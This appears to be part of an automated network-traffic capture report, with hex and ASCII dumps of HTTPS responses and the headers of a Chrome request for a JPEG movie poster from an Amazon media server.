                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: cd ed e8 01 ec f9 8c 0b 20 00 01 27 26 d1 d5 47 2f 57 d2 cc 05 3c de fe 5f 6e 98 cf ef 5f 1d ed e1 e7 f7 ef 87 f3 d7 7d ea c3 c5 80 e1 36 fe 95 38 fa 78 c0 37 c4 00 00 0d c1 a7 e5 9e be ca c4 d4 fc cf 2f 6f d0 1a f1 e8 bd 4f 4d e9 0c 06 e1 f7 2c f6 3d b6 a2 d0 5e 2e dc da db 1f d9 f4 f0 ea c1 1d fe 7b 4c d4 88 10 00 88 60 00 72 f2 75 89 be d4 3a e4 bc bd ec 60 08 2f 30 00 1a 1b 8b 54 d0 9d 88 71 4a 6b b1 cd d1 27 4c a1 8b 94 e9 d8 e3 8c 6f 2e 7e 18 17 24 a3 2b 39 63 c4 58 98 c4 02 26 00 00 73 70 82 19 2a 1c 50 00 00 00 02 51 60 a4 2c 49 08 98 4a 00 a0 c1 00 00 ec 44 96 80 10 20 40 00 00 01 0c 4e 52 32 48 80 06 81 88 18 82 44 40 94 58 c2 52 c4 94 54 00 00 01 9a 88 0a 00 80 04 13 43 00 00 00 6b 11 a4 40 40 d0 34 d0 00 00 00 03 71 94 a0 0a 34 00 00 d1 63 52
                                                                                                                                                                                          Data Ascii: '&G/W<_n_}68x7/oOM,=^.{L`ru:`/0TqJk'Lo.~$+9cX&sp*PQ`,IJD @NR2HD@XRTCk@@4q4cR
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: c8 57 1a f1 52 b7 cb 89 c2 15 df d6 57 6c d6 c6 a3 ae 7c 7b 13 0f fd f6 f6 a9 d2 c4 eb 39 8c 8a 2c 89 0c 1a 7a aa 2b 57 6a fa 90 85 eb d4 ff 00 91 09 d7 90 7e fd aa a8 d6 4a e7 a2 49 37 56 72 16 b2 73 c3 5e 36 89 ac 56 54 cf 21 a9 66 cb d7 01 85 c6 ce 3d 45 cf 19 6a 2e 64 1e c8 f2 a7 fe ea 97 18 7f 20 86 ec ab 1e 4d 7c 5c 40 90 a7 97 b1 4e 38 ae de 52 c5 b8 d9 9f d1 c1 61 fd 69 76 33 33 9a 8a 51 d2 95 01 de 78 8c 9c 85 14 4c eb 0a f3 3b e0 7a f2 80 89 ad 13 ae 50 84 6f a0 c8 d7 30 86 6b 17 90 f5 79 13 3d 66 6c f5 64 84 f4 c5 a6 f2 fd ef 65 eb e3 c2 57 5e b6 45 b5 db dc 2a f2 c0 db f5 e4 b3 cd bb 1c 35 88 c9 fe 1e 64 5a b9 68 ad b4 da 5f 9a 6b 32 03 b2 74 23 27 ec 31 8d b3 3a c6 e2 4d b6 61 6e f2 34 a5 2e 11 57 c3 e3 97 14 75 c1 31 91 f1 9e d2 26 26 8c 4d
                                                                                                                                                                                          Data Ascii: WRWl|{9,z+Wj~JI7Vrs^6VT!f=Ej.d M|\@N8Raiv33QxL;zPo0ky=fldeW^E*5dZh_k2t#'1:Man4.Wu1&&M
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 64 46 9a 5c 07 59 86 77 14 7c 5b ea 8b b7 91 8d 63 9f be b3 38 c9 7f ee a9 33 c2 79 10 c2 dd 26 52 12 4b 88 20 a5 5a 5f 30 d3 ce e5 3d fa 82 a8 81 b2 3b 72 f9 38 b4 7f b7 f0 62 2f c5 56 47 3b 62 b0 64 f5 60 72 70 25 d6 77 6b ca bf 78 18 44 c8 22 23 05 26 40 b4 f3 de 79 46 17 17 2a fd e6 df 7e de da be ed b7 1d 49 6f a9 f8 93 92 6a f6 d5 4f 26 e1 ec c6 e4 f1 d7 3f e5 80 c6 2c b9 c0 66 68 d7 fe 16 bc 9a 4f d9 6c 77 3d 49 6f f1 c1 68 19 c7 55 7c 97 ae 38 b2 72 f4 6c 7f 22 46 39 93 cb 49 b7 8d a7 ee bb 5e 49 05 ec ab 19 36 33 7d 7d f5 3e de df 2e fa e5 ae 5a e5 f4 9d a3 ed f2 72 d7 3d 73 8d 76 6b 96 ff 00 4f b7 e4 df 5b ff 00 7f 7f e8 ed ff 00 ec f4 04 7a 30 60 b2 aa 66 e3 65 b5 f1 80 09 b2 05 14 12 5e 93 4b a4 a3 05 96 b2 35 26 16 e8 0f ea f1 9d b7 fa 70 9f
                                                                                                                                                                                          Data Ascii: dF\Yw|[c83y&RK Z_0=;r8b/VG;bd`rp%wkxD"#&@yF*~IojO&?,fhOlw=IohU|8rl"F9I^I63}}>.Zr=svkO[z0`fe^K5&p
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: fa d3 c2 3c 96 05 cd 95 65 0c 6d 93 b4 37 e1 ea a6 e3 1b 37 73 38 15 aa 0d 26 85 30 bc bf f7 99 59 f0 42 1d 6a db 32 5f 34 d2 4d 74 9c 5a 69 31 b8 f1 4d d0 b4 64 dd 9c 15 99 3f 59 77 d9 4d 59 39 9e 48 17 8b 07 00 2b 18 92 11 89 cd 02 d2 c7 01 27 0b 49 12 84 06 30 51 4d db cc a8 c5 66 d6 78 28 b9 aa 63 28 c1 37 47 d9 d9 d6 28 9b a2 19 67 58 a2 b3 07 f6 62 d6 ec d0 88 a9 25 1d 16 bc 3d b4 9a 30 ac 2d 9e 5f c8 64 a6 e3 62 97 21 ad a6 4e cd 4d d0 45 2e 43 5b 4c 9d 9a d6 b3 b2 37 c4 63 22 41 1e 9d 59 94 6b bf 34 e3 7b b5 35 f1 4e 38 6f e8 71 32 37 a7 1b db e6 aa a4 a7 1b a7 66 69 e0 8c c2 79 25 b8 19 c3 92 79 bd da 9a f8 a7 99 38 99 a9 46 87 2d fd 0e 26 30 93 30 8c 9e 35 46 87 2c 93 cc c6 33 54 4c 1c b2 4f 24 0c 89 90 9e e2 37 13 21 3d d7 7b 33 44 62 77 51 19
                                                                                                                                                                                          Data Ascii: <em77s8&0YBj2_4MtZi1Md?YwMY9H+'I0QMfx(c(7G(gXb%=0-_db!NME.C[L7c"AYk4{5N8oq27fiy%y8F-&005F,3TLO$7!={3DbwQ
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 1e 83 43 96 5f 7c 69 36 80 44 e5 f3 5b 96 24 a6 dd 0d ef 5a ae 15 fe 5e 82 79 04 10 41 34 8e 3d 78 27 b9 04 10 42 39 d3 ae ee 67 cd 0b a7 80 f4 e2 a9 e6 51 aa 38 4a ad 99 c8 e4 bf c7 2e ee b7 0e ca d1 b3 1b b6 91 c6 13 ab 0a be a8 07 11 81 df f8 aa b7 36 e6 3a cc 1b eb d1 ad 69 81 e8 2b 55 e7 a3 66 47 82 cf ac cf e2 bf 05 aa c2 8f 46 b5 9e 3d 18 3f ab 18 f4 62 0f 82 3a 4c 3c a5 14 28 11 af 65 d4 54 9a c7 3e 81 d4 e5 d1 97 c1 18 f7 45 4a 14 3d 1a d6 87 35 8b 88 ef 9e 81 87 56 6a 30 e3 c3 a3 1c c7 69 48 8c 90 0b b8 6e 8f 9a 11 2b 24 61 a8 52 3a 91 44 65 b9 2c d3 66 32 5b ea 37 ca 08 cd e2 b1 c8 6e 55 46 a7 1e 1c 16 5d 59 c1 37 c1 0f 2f 92 b5 3c bf 21 35 ce e2 99 e2 80 1c ba e6 78 15 2c 56 fd d0 aa 79 12 53 7b d1 8f fe 15 d9 8d 07 89 be cd 79 31 43 f0 4d 6b
                                                                                                                                                                                          Data Ascii: C_|i6D[$Z^yA4=x'B9gQ8J.6:i+UfGF=?b:L<(eT>EJ=5Vj0iHn+$aR:De,f2[7nUF]Y7/<!5x,VyS{y1CMk
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: f9 4f ef 97 00 37 38 87 ac 52 7e 5b 5a b5 b8 fd 51 52 bd 9d 58 07 d5 1a be b7 e7 ef 7f ab 98 ec 45 03 eb c3 e1 68 57 aa e5 f9 2c 6d 6c b6 aa 97 fe 4a 4f fe 70 c9 63 82 d8 41 2f 37 f8 0d bc 95 99 0f 51 85 81 87 57 d7 cc 58 5e c2 81 cc bc 59 0a 90 f3 1c 0d d9 df 32 f6 d1 2d 7a 2b 6d 64 71 8c 5c d3 64 7a 6c 6e e8 ae d0 50 88 af d8 0d 3d ce 38 99 5d 93 2c 27 b3 d6 53 98 02 cc 5e 22 bc 60 fb a2 04 cb d2 0e 37 8d ca fd 2a d8 ab f8 11 25 15 c3 3a f7 eb 18 e1 b5 67 d7 39 49 f1 fb bb 3c 46 29 a4 c3 57 d5 f3 12 db 87 fb 4f be 60 58 0f 99 5b d7 bc 1e b0 72 e6 d5 f6 36 c5 94 aa e0 ea e1 de 3f b5 dd 34 dd 31 e0 f5 94 b6 c0 16 d1 c3 e8 c1 a8 5e 8f 6f a1 0d fa 77 f6 8a d3 bc 0a be ad 22 14 85 dd 58 b8 6a 68 82 7b 1b e5 14 1d 20 ba 6c f6 96 60 7a 3b 6a 12 f9 12 e9 54 24
                                                                                                                                                                                          Data Ascii: O78R~[ZQRXEhW,mlJOpcA/7QWX^Y2-z+mdq\dzlnP=8],'S^"`7*%:g9I<F)WO`X[r6?41^ow"Xjh{ l`z;jT$
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: bf 9d 7d 58 1c 78 d3 7a e2 bf 78 47 81 5d f7 b7 ac 12 b3 10 95 ff 00 60 c2 77 58 fd 3f f7 e1 6d 7c 55 4b 6e be 67 23 ac 59 b8 1a f5 52 be 90 ba ba f7 18 d7 e1 ed fe 27 e9 28 eb 93 5d 98 3d a1 23 4e 75 c1 52 ff 00 51 20 7f 99 59 9a 7a d9 e0 2b e9 b9 b6 74 b4 d3 25 c0 cd d9 e3 ae e6 59 80 e0 3c 44 5d b1 de cd c2 08 e6 56 52 af 04 02 c8 b9 70 2d 7e e9 5b 0f 1d 16 ab a6 48 c6 da aa f5 5c bf a0 09 53 20 73 62 47 ea d4 af 9c fe c4 da 50 f5 ed 79 8d da 06 3d a7 78 d2 75 0d e7 89 e3 cc 2b 55 73 fb a6 3d 22 ad 4c aa dd 98 7f 8f 49 7b a0 90 8b 70 7f 67 b7 c2 d8 62 f7 4d 5f c0 22 bb 85 be 49 a6 b5 fb c3 3a 21 5b 3e eb ca 60 ca d8 47 48 fb 4e 5b f7 6f 07 62 1e bb 6a bc 9e b7 44 b3 bd 60 4d f6 4f 0c 6a da d7 fd 2c 0b f0 d4 af 85 5f ec 2a 5e 3f 38 25 d6 37 a8 ca b9 c4
                                                                                                                                                                                          Data Ascii: }XxzxG]`wX?m|UKng#YR'(]=#NuRQ Yz+t%Y<D]VRp-~[H\S sbGPy=xu+Us="LI{pgbM_"I:![>`GHN[objD`MOj,_*^?8%7
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 5b fd 90 d6 48 47 77 12 d5 73 e6 4b f8 b5 35 f5 37 69 a9 51 6a 5a c7 fe 36 1e 9c 4b a7 1b 1a c8 50 17 a3 a6 2c f8 75 81 6b e0 6e 79 6e 71 6f 5a ce 12 8d e4 a0 a7 20 71 0e da 26 c9 81 dc bd 30 3a 2e ef 7d d3 be b2 f3 7e e5 a7 36 46 b4 b2 e6 c3 b6 3c 95 83 1a 87 b1 10 58 3c 37 7e e3 fe 9b 3e 5f ff c4 00 29 10 01 00 02 02 02 01 04 03 01 00 03 00 03 00 00 00 01 00 11 21 31 41 51 10 20 30 61 71 40 81 91 a1 b1 c1 d1 e1 f0 f1 ff da 00 08 01 01 00 01 3f 10 95 e8 df 64 54 2f a7 4c b6 2f b5 84 b8 c1 49 48 5f 7a 65 c2 10 32 e2 69 e0 3b e2 30 89 46 17 85 4f 6a b8 94 2b 06 8c d7 76 8b c0 51 29 db d6 3e 1a 62 37 71 ac 4e ab d1 88 9f 34 68 3a ee 6a a4 6f 09 85 a1 18 2f 66 25 df 97 76 57 b9 d3 98 4c c9 a3 5a 96 ce a4 e2 db 28 5b 12 85 00 0d d9 03 19 d7 d2 ee bf 8a 5b bb
                                                                                                                                                                                          Data Ascii: [HGwsK57iQjZ6KP,uknynqoZ q&0:.}~6F<X<7~>_)!1AQ 0aq@?dT/L/IH_ze2i;0FOj+vQ)>b7qN4h:jo/f%vWLZ([[
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 7b b3 d8 0f 89 64 b1 7d d3 f0 49 ca 08 1a 12 9b 02 b2 92 1a a3 49 c0 ed fd a0 4b 65 27 84 e5 35 0c cf 99 d6 c5 b5 4d 5f f1 b9 8b e1 60 73 54 56 ad af a9 e7 62 15 3e d5 7e c2 42 f1 81 8d d6 75 f9 ea 5e 58 ab 1f 10 39 ca a6 ad 5a 62 bc 9c 92 cc 8a e7 f2 00 30 c3 c5 79 25 43 d2 fa 00 2a 66 9a 77 d7 a1 b9 3b 8f 26 07 eb e9 eb 29 00 d2 55 ce d7 e0 41 c4 ef c9 5a 1c 5f f5 2c 55 2b fc 03 3f 8a f5 fd 5b 4b 9a 82 aa 2c c3 34 66 a5 7e 75 98 0e d5 7a 74 44 c5 3e 4a d0 8e ea ef 74 ad 10 a5 5c 0a 2f 8a c2 33 3e 7f 54 b6 54 e5 9f 3a b7 3a 06 2c 58 d5 c5 8f ea d2 0d 93 6e 8e 2c 8f 91 7e 5f 08 02 72 25 d0 18 17 a1 e2 fc d5 f8 a7 72 e4 23 55 58 a8 65 1f 4a 6f d1 98 d0 67 76 33 1f cb 85 e6 df 78 54 30 49 95 56 5f 17 e5 f4 28 ad be aa f6 7a ed ea fd b6 b3 2d 62 a1 c2 53 d7
                                                                                                                                                                                          Data Ascii: {d}IIKe'5M_`sTVb>~Bu^X9Zb0y%C*fw;&)UAZ_,U+?[K,4f~uztD>Jt\/3>TT::,Xn,~_r%r#UXeJogv3xT0IV_(z-bS


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          22192.168.2.1649737151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:56 UTC660OUTGET /images/M/MV5BMDVkMWVmMjYtNjE3YS00YWIxLWE5MDgtMWUzMTIyYWJhMzA1XkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:37:57 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 34829
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 835b4a77-1023-4496-98c3-351ee5c6ac16
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Thu, 29 Mar 2018 21:15:11 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Thu, 08 Dec 2044 01:06:16 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 210700
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:57 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200102-IAD, cache-ewr-kewr1740070-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 c7 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 01 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 06 07 04 05 08 03 01 02 09 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ec bf 9f 40 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5@
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 26 b5 4c 6a fb 14 26 da e5 14 9e 1d f0 21 b1 1b 80 50 7b fb 74 52 12 8b 1b e8 31 4c 9e 3b fb d2 d9 f4 6e b6 8a da f8 ee 78 9b 3b ac f2 ec fc 59 66 bc 41 30 00 00 28 0b fd 13 fc ba e8 4e 8d e2 fa 74 77 ef 28 d2 fd 5f 34 90 59 d4 14 02 6b d7 88 6c ca d4 04 00 00 f0 4f 35 c8 74 30 1c 7a 6f ea 2a cf bd ef 4d 76 de 86 e7 b8 9b 7a af b7 fa 42 2d 16 95 1a f3 02 00 00 00 00 02 a7 e7 1e e6 56 ff 00 cd bb 87 af 2a 48 bf 36 ec 66 90 28 bd af 35 e6 bf 54 76 74 87 87 3e cd 7b 46 b0 a3 7f 66 d6 35 b2 fc d7 59 be 7d 4b 62 d6 62 50 9e c2 9f de 9c e3 d0 59 8b 62 16 a0 00 00 00 00 08 31 39 44 71 89 ba b3 80 1d 16 a2 74 c7 47 fc ac a1 25 f9 91 51 c8 89 d2 0b 92 4c 55 ce 71 38 d4 60 7e 22 79 56 cf af f4 b8 f5 dc 77 d7 2d f5 26 dc bf 44 d4 00 00 00 00 00 7c fa 0d 27 8d 6f 20
                                                                                                                                                                                          Data Ascii: &Lj&!P{tR1L;nx;YfA0(Ntw(_4YklO5t0zo*MvzB-V*H6f(5Tvt>{Ff5Y}KbbPYb19DqtG%QLUq8`~"yVw-&D|'o
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 2a ac 58 55 da 1d 36 b6 9e 7a 77 29 53 4e 90 2e e7 bc d6 dd fb 43 eb 5f 0f c1 99 24 97 f0 e7 1b 5a 81 0a 17 22 5c 9c 53 dd 6d 2c 2b 9b bd 6f 2d 12 90 a1 d5 8e 5e 02 cc d4 91 30 39 a7 b6 56 0f 4c a8 c4 d3 90 98 cf 32 2f 7a 17 08 4e da 5f f6 2a dc e5 de af d5 c4 ee 24 ac 55 9e a3 25 a7 b6 cf 50 8e ec 79 3f 9a fb 53 92 c6 50 1a d7 57 b7 9f b0 ab 85 ca d3 a9 65 65 0d 0f 9b 78 68 87 72 42 2f 83 4e a3 06 8c dd f6 8e a7 75 44 ec 72 1a 28 b6 31 34 96 98 35 d2 2e 49 ad 98 24 d7 b4 b1 36 27 91 b7 56 bb 6f d9 66 1e 06 91 8a 10 cb a6 6a dd 4f d3 93 f9 75 3b 3e ae 16 4f 0b 7b e9 ad be dc 3f 11 6e 1b 66 82 64 b8 dd c7 1c b9 16 ef 50 47 d8 a9 16 cc 7d 51 58 6d a5 b7 51 93 5d 2a 1e d5 d9 7b d7 2c 68 28 cf dc d3 dc 12 8c 52 59 08 c6 c0 b2 33 77 ba 04 c6 f5 a4 8e e2 a6 88
                                                                                                                                                                                          Data Ascii: *XU6zw)SN.C_$Z"\Sm,+o-^09VL2/zN_*$U%Py?SPWeexhrB/NuDr(145.I$6'VofjOu;>O{?nfdPG}QXmQ]*{,h(RY3w
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: d3 78 7c 3e be 69 8f c9 f1 08 fd b7 86 81 fd af 0f 88 1b 16 ad 5a 68 c5 b5 bd 36 70 70 77 f7 c4 d6 3b db 7d 0b 07 e3 78 e8 e9 db 43 ec 5d 3d 86 49 1a 5e dd a2 85 9f 1c a1 d2 3d 34 c4 9b 43 5a 33 c2 23 69 ac 3b 62 27 b0 2d 23 3d 0b 47 21 03 47 62 46 cd c2 d0 ac 11 44 3f 4f 7c ab 54 9a 7b 3f 35 4d 61 9d bb 3a 26 de 64 a5 d3 b6 0d a1 6d 8a 4c f2 78 6b ff 00 60 56 85 fd 61 e3 ad 3e db 66 ac d6 80 98 89 db e4 d6 93 7d a4 de 1a 23 6d bb 8b c3 e2 11 9b 53 5a 69 cd b4 15 77 7b c0 f1 ad 75 93 0e f5 05 cb 98 a5 26 7b b7 44 42 0d f4 84 29 5b a9 24 8a 1d eb 25 dc 91 96 5a 7b d9 00 dd 57 73 18 53 70 6b c9 49 c2 cd 7f 2a 19 70 25 90 43 23 98 ee 64 e6 0a d2 4b 2a ca c2 8d fc bb 6a 47 91 61 c8 6d 46 45 47 61 d5 38 6c d7 55 2a a2 b5 1b d9 36 ae 23 be 79 7b 55 bc 9c b1 a3
                                                                                                                                                                                          Data Ascii: x|>iZh6ppw;}xC]=I^=4CZ3#i;b'-#=G!GbFD?O|T{?5Ma:&dmLxk`Va>f}#mSZiw{u&{DB)[$%Z{WsSpkI*p%C#dK*jGamFEGa8lU*6#y{U
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 07 be fb e9 3e 8b 62 d9 44 7c 4b 53 69 9c d8 d9 f0 db 6c 7b 88 ab 1f 89 bc 0a 2e b5 ca 94 64 51 eb 24 c9 17 bb ae 82 84 a8 57 7d 75 11 d7 55 15 75 51 0c 54 97 11 c3 ef fd 4a de 96 e6 37 52 e3 ad 82 a6 9d 24 f2 be a0 50 6f e2 95 f1 6f c8 34 61 8b eb af c4 bc b7 ea 10 29 86 d5 53 97 37 08 21 92 45 1a 8c 08 b6 51 63 44 40 f7 1d ef 66 32 4b 21 37 96 11 c3 6c 92 8d 0d 88 9f 02 f2 31 14 d2 2d 5c c6 bf a7 25 68 8a 0d c5 5e e7 9a 5c cd 63 12 d9 ac c3 43 7c 5c 11 57 78 8e 49 96 9b 46 5e 9f 78 7e e4 d6 3f 6a db b4 21 89 25 63 fa dc d2 38 58 64 d6 6e 2d df 6c b7 77 ed 14 29 3c 69 ab 5c c8 4a a6 99 76 f7 48 e5 ff 00 02 ff 00 b4 f3 56 a6 7f 64 2b e1 f3 f5 d8 55 ca fd 49 ab 50 fa 96 49 5a 2f f6 52 af 8e 2e 65 cd cf 97 4e 1b 74 27 db 31 ad 56 d1 e0 90 93 65 7d 1b a0 b7
                                                                                                                                                                                          Data Ascii: >bD|KSil{.dQ$W}uUuQTJ7R$Poo4a)S7!EQcD@f2K!7l1-\%h^\cC|\WxIF^x~?j!%c8Xdn-lw)<i\JvHVd+UIPIZ/R.eNt'1Ve}
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 5c 17 12 ca d1 a2 b5 45 ef 96 ad ad f3 6b 13 b6 de cd be d5 c2 99 b3 6c 39 65 91 ea e1 9a 0c 3b 42 e5 4c 61 a2 cb 28 cb 48 de 86 4f ac 2c f3 0c 23 f7 71 d0 5d d1 58 66 68 83 4b 0a 08 fe c0 7a 50 bc 80 0f fd 78 72 a1 1a a4 c0 36 d8 00 af 2c 02 5f a7 ca 1e ed d6 4e 49 2a 43 0b f0 2c 76 68 31 b4 c9 6d 1c 6a a1 5c 1f f7 3b a8 e9 5a 9b bb 75 15 3b 72 72 4a b3 5c 23 3c 2e 2e 66 8a 61 b6 48 37 f1 a7 27 c8 b6 e8 b8 c7 4b 1d 1b 74 0a 45 06 c6 70 80 60 46 0c 08 71 4f 6d 1b e3 74 96 90 c8 72 ec 81 bd 78 d6 b8 d6 99 00 f4 ff 00 aa de 17 d5 96 27 f2 11 c3 16 30 24 8c 6e c0 8d 30 30 14 0f 4d a3 d6 9b 23 da 5d c7 7a 69 b0 71 42 7f fb e5 5c ed ae aa 3c 6e f0 dc 2b 78 a7 97 8f b9 e5 39 db 5d 40 18 2d d4 2f 7a 4b 84 7c 6d f1 73 85 26 8c 8d 82 68 ca c0 31 a8 59 cb 2e 46 06
                                                                                                                                                                                          Data Ascii: \Ekl9e;BLa(HO,#q]XfhKzPxr6,_NI*C,vh1mj\;Zu;rrJ\#<..faH7'KtEp`FqOmtrx'0$n00M#]ziqB\<n+x9]@-/zK|ms&h1Y.F
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 30 c6 26 8f eb cb 0d dd 08 23 ef c4 7d 8c b2 e7 b6 bc d5 8f b4 4b 49 df dc e6 ca 44 38 c2 58 93 93 eb 59 d9 75 e7 a3 7e b9 a1 ed a3 0c 67 eb c8 5d 08 a2 1a 06 31 f9 fd 76 d0 b6 13 b4 6f 3b bf eb e7 5f d0 d7 75 1c 83 31 3d 8f c2 11 38 64 cd d2 69 0b 54 1a 4e 87 e7 7d e9 e9 ba 5e bc 94 66 bb 56 7e 95 8a 15 a6 e1 3a 26 36 dc 1e 96 9f a6 6a bd 3b 16 ab 4b d3 54 ab 24 12 4c 63 e2 cc 82 0d 9e c5 b6 93 c9 93 a7 2d c6 61 06 7d 8a cd 64 2f 2f c1 3d 58 64 5d a5 e5 8b db be 5b d5 10 7f c1 ee 23 57 ca 18 76 76 d5 99 ec 57 de a7 9e b5 da dc a9 49 7e 85 fa d5 a4 a5 b7 79 cf 9c 3e b6 af f4 b7 25 d3 77 a3 b2 93 bf d6 55 bb 3c a3 e0 b3 bf d4 95 76 f5 09 d5 d5 17 74 92 d6 86 f7 4a ae dd 66 a4 2d bf d1 b3 05 15 95 7a c2 b2 ee 93 5a 2d d4 14 e2 a7 72 bc 32 ef 7b 75 9a b5 a1
                                                                                                                                                                                          Data Ascii: 0&#}KID8XYu~g]1vo;_u1=8diTN}^fV~:&6j;KT$Lc-a}d//=Xd][#WvvWI~y>%wU<vtJf-zZ-r2{u
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 54 10 92 f6 5a 43 38 b7 7e b5 8d 78 77 da 64 d7 6b b2 f1 58 9d 3d 85 d4 25 f0 a7 af 4d 23 ef 1e 9d cb af 3f 2e 4a 51 5d 15 e1 0f 23 b3 a0 b1 14 2b 48 69 0f 78 fd 99 60 14 a0 ba 1f 3f 72 f8 2e 03 f5 7a a8 f0 69 60 e3 c5 53 07 dd c5 42 2f d7 ac f3 45 1f 72 f3 1c 54 25 ee 18 d4 eb c1 37 5b 7d 9b b5 18 ae aa bb 56 04 8c 0d 64 6f 58 41 9b 71 30 97 9a b8 c8 b9 3c ae cd 92 9e 96 eb 58 6c 69 60 be f7 ea 99 e7 c1 75 7f fd 73 57 45 d1 5b 95 dd 1c 6f 0b f7 e8 de 31 0a 87 ec 64 02 94 10 e8 8f 12 8a 2a 42 2e 3b f6 a3 a5 10 1c 55 ca e1 2b c9 93 cb 1c 3c 51 3b 76 17 1d 9a 83 aa 8a 46 c9 d7 5e fd 69 a7 75 d5 27 c5 1a 5e f3 d7 39 57 93 55 0f 75 45 bd fa 22 b5 bc bb 3e f7 a0 ce d7 e2 6c f8 a2 dc c3 91 e6 08 57 9a 50 b3 d1 f6 2e b0 df 87 73 2a 16 3c 7d 7e 29 1b 8e 0a 44 54
                                                                                                                                                                                          Data Ascii: TZC8~xwdkX=%M#?.JQ]#+Hix`?r.zi`SB/ErT%7[}VdoXAq0<Xli`usWE[o1d*B.;U+<Q;vF^iu'^9WUuE">lWP.s*<}~)DT
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 70 c6 25 7d a9 4c 52 58 de ae 24 cc 92 ee 2c d5 dd 1c eb 4f ab 42 c7 b3 b9 47 2f a9 af fd a3 e2 02 6c e3 ad e8 21 d9 77 47 6c 2c 62 ef e9 bc c3 df d1 d6 8b bb e0 b8 3f 02 fd 17 da ee e8 ed 42 bf 87 07 72 be bc 44 3e 2f b9 59 36 a2 cb 00 29 a1 69 a6 ff 00 76 7b 56 94 0f 2b 36 5a 4f 30 e7 91 4d 3c 9c 67 78 0e ba d9 46 6b 39 c3 34 c5 30 e2 66 bb 0a 21 c5 5e 1f 55 36 fa 29 b4 b3 cb 1b d3 08 44 59 57 2c ed 62 2b 22 f7 12 be 6b b5 07 ea 88 42 87 5e 31 a3 68 c8 3f 68 26 cd b7 77 66 1b 55 7c 6e f2 55 00 b6 6d 9b b0 72 a5 09 a4 b4 b3 5e af 23 a8 a2 18 40 4e 8c f8 bf 82 0d 9b 90 bb f8 91 59 37 ad 39 6a a9 da cf bd 67 36 4e 33 4b 2c 61 24 4c 12 99 ad 98 6c 75 a4 1f de a4 44 56 be 8b 36 1a e7 e1 3a 60 51 85 e2 80 4d a4 e6 20 36 c9 66 e7 1b ad 11 66 10 48 d6 5f 88 53
